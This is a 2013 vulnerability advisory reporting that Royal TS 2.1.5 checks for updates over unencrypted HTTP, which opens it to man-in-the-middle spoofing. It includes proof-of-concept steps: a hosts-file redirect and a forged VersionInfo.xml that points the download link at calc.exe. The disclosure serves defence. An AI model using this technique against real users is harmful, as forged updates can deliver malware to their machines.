[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5
===============================================================================

Author: Janek Vind "waraxe"
Date: 29. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-101.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Royal TS is a simple, yet powerful tool for administrators, developers,
system engineers and many other IT focused information workers that supports
them in working effortless with their remote systems or management consoles.

http://www.royalts.com/main/home/win.aspx

Vulnerable is version 2.1.5, other versions not tested.


###############################################################################
1. Update Spoofing Vulnerability
###############################################################################

Current version of Royal TS contains security vulnerability in update mechanism,
which can be exploited by malicious people to conduct spoofing attacks.

When checking for updates, Royal TS issues GET request over HTTP:

GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1
Cache-Control: no-cache
Host: www.royalts.com
Connection: Keep-Alive


Server response:

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT
Accept-Ranges: bytes
ETag: "d11e6057ebc3cd1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 28 Mar 2013 19:54:39 GMT
Content-Length: 13375

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Major>2</Major>
  <Minor>1</Minor>
  <Build>5</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL>
  <ReleaseNotes>
&lt;html lang=&quot;en&quot; xmlns=&quot;http://www.w3.org/1999/xhtml&quot;&gt;&lt; ...
  </ReleaseNotes>
</RoyalVersionInfo>



Royal TS user can click "Start Download" button and Royal TS
will open web browser with download starting dialog.

Such update mechanism contains security flaw:

Update check is done over unencrypted HTTP channel. Malicious third party
is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.
In this way it is possible to instruct user to download malicious update.


Testing: tests were done using Windows 7 and Apache webserver. Steps:

1. modify "windows/system32/drivers/etc/hosts" file in order to emulate
DNS spoofing:  127.0.0.1 www.royalts.com

2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory
with following content:

<?xml version="1.0" encoding="utf-8"?>
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <Major>2</Major>
  <Minor>3</Minor>
  <Build>4</Build>
  <MinorRevision>61116</MinorRevision>
  <DownloadURL>http://localhost/calc.exe</DownloadURL>
  <ReleaseNotes>
New version 2.3.4 available!
  </ReleaseNotes>
</RoyalVersionInfo>


3. Place "calc.exe" file to the webserver main directory.

4. Open Royal TS, it will check for updates automatically, resulting in dialog:

New version 2.3.4 available!


5. Press "Start Download" button. Default web browser window will be open
offering file download:

"You have chosen to open calc.exe"



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------